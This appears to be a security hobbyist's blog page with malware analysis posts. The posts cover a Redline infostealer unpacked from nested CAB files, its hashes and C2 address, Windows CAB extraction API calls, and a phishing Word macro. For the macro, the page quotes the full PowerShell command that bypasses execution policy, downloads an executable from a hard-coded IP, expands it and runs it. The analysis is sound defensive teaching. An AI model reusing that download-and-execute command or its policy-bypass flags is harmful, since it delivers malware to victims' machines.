Showing posts with label CAB. Show all posts
Showing posts with label CAB. Show all posts

Thursday, February 16, 2023

Redline Malware Malware Analysis Feb 16 2023

Started with this redline malware sample 

https://www.joesandbox.com/analysis/808971/0/html

Which the sandbox says dumps a bunch of child-processes and eventually drops these 2 payloads

AV killer

https://www.virustotal.com/gui/file/850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

Healer.exe

MD5 7e93bacbbc33e6652e147e7fe07572a0

SHA-1 421a7167da01c8da4dc4d5234ca3dd84e319e762



Infostealer

https://www.virustotal.com/gui/file/dc28c9d9ab3f30222ed59f3991c5981bec40604e725ece488d8599eef917a7b3 

The Infostealer looks a lot like this blog ( https://securityscorecard.com/research/detailed-analysis-redline-stealer/ )

Franchise.exe

MD5 dd0c9e110c68ce1fa5308979ef718f7b

SHA-1 473deb8069f0841d47b74b7f414dacc6f96eca78


C2: 193.233.20.13:4136


It is stored in a self extracting .CAB file (microsoft cabinet)

It unpacks itself 4 times actually before we finally see the payload.

Each time the child .CAB file is stored in a Resource named "CABINET"

Each time there is 2 .exes inside the .CAB .

Each of the repeated dumps the "RUNPROGRAM" resource launches another child .CAB extractor.







Eventually though on the last extract it's 2 .NET executables instead of X86 and .CAB extrator.



The first .NET executable is an AV killer that turns off defender, windows updates, etc.



The 2nd .nET executable is the infostealer that grabs wallets, vpn , discord, and much more








                                            
There are some Russian characters and nearby region country names



There is also code for the c2 command and control traffic that is Xor'd with a key "Sigma" and base64 encoded. 193.233.20.13:4136











Posted by at 3 comments:
Labels: , , , , , , , , , , ,

CAB files FDICreate FDICopy

 call ds:__imp__FDICreate (creates context for extracting Microsoft .CAB Cabinet files)

...

push offset pszCabPath 

call ds:__imp__FDICopy


You should see memory for the Cabinet (or CAB archive-file format) recognized by their first four bytes (also called their magic number) MSCF

After the FDICopy you'll see extracted files (possibly .exe malware) in the file path that was in pszCabPath

Posted by at 3 comments:
Labels: , , , , ,

Monday, March 16, 2015

Talking Thru some Malware in a Microsoft Word VBA Macro

There was this phishy email

From: Forrest Chavez Carmella.7b@lepau.com
Subject: Outstanding invoices - 122680 January
Attachment: 122680.doc (MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f)

I posted a few more details here. Just by the looking at the sender (somebody I never knew, a domain name I've never heard of) I shouldn't have opened it. The Subject is trying to play on my emotions and get me to be upset that I have an open invoice, but I should know better and realize it's just a trick and never open it. Also the attachment is terribly named with some ugly numbers which should make me cautious as well.

But anyways, let's say I'm stupid and opened this phish. I thought I'd walk through what this is attempting to do. Inside the word document there is a VBA script (Visual Basic for Applications). If you have Macros enabled or click run Macro, then you can become the victim.

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

  • 1.) First you'll see ...

    cmd /K powershell.exe -ExecutionPolicy bypass -noprofile XXXXXXXCODEXXXXXXXX

        A.) 'cmd' is your friend command prompt

        B.) '/K' is a parameter being sent to 'cmd' telling it to run the upcoming command and keep the prompt open after it finishes

        C.) 'powershell.exe' is the command to run, and Powershell is your IT administrator's powerful little scripting prompt that gives them the ability to do anything that the User Interface could do but in a scripted fashion.

        D.) '-ExecutionPolicy bypass' is utilized because in general Powershell protects users from malicious scripts, but there are parameters you can pass to 'powershell.exe' that give it a 1-time bypass of those security restrictions and allows something malicious like this to run.

        E.) '-noprofile' is utilized to also try to bypass any tools your company may have running. By default you have a user profile and some scripts that generally run when you open powershell that your company sets up to keep you safe, secure, and make sure all your apps work properly. Using '-noprofile' bypasses those scripts and says just run my 1 evil script without anything else running first.

        F.) Finally we get to the Code, I abbreviated as XXXXXXXCODEXXXXXXXX , but I have more detail below in #2

  • 2.) Second you'll the Powershell script code that tries to download the payload

    (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab')

        A.) '(New-Object System.Net.WebClient)' is the equivalent in a high level programming language like of declaring a new variable such as WebClient c = new WebClient(). You are basically creating a powerful object that will allow you to connect to the internet and perform operations.

        B.) '.DownloadFile(XXXURLXXX, XXXXLOCATIONXXXXX)' is a function you can call on that powerful WebClient object which makes the downloading and saving of a file as trivial as passing in the URL ( XXXURLXXX ) and the save location ( XXXXLOCATIONXXXXX ). The URL in this case ( hxxp://62.76.41.15/asalt/assa.exe ) contains the payload or the evil malware. This could be anything from a KeyLogger, to Ransomware, to anything under the sun. And it's saving it to '%TEMP%\JIOiodfhioIH.cab' , so the Windows Temp folder as a normal looking '.cab' file (generally used for things like Windows Updates, etc.).
  • 3.) Third you'll see a command script trying to extract the contents of the CAB file

    'expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;'

        A.) 'expand' is another windows command that gets run against 'cmd' that is able to extract the contents of a CAB file (CAB files are kinda like ZIP files)
  • 4.) Fourth and finally you'll see a command script trying to execute an EXE

    'start %TEMP%\JIOiodfhioIH.exe;'

        A.) 'start' is another windows command that gets run against an 'exe' that came out of the CAB file. If this command succeeds, then the malware has been run and you're likely infected.


So in summary 1.) Get a phishy email 2.) Open the Word Doc 3.) The malicious VBA Macro runs inside 4.) It uses powershell to download a CAB file 5.) It uses 'expand' to extract the malware from the CAB file 6.) It uses 'start' to run the malware.

Boom, you're infected! If you want to prevent this, a good start would be not opening such evily suspicious looking emails :-)

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at 2 comments:
Labels: , , , ,
Subscribe to: Posts (Atom)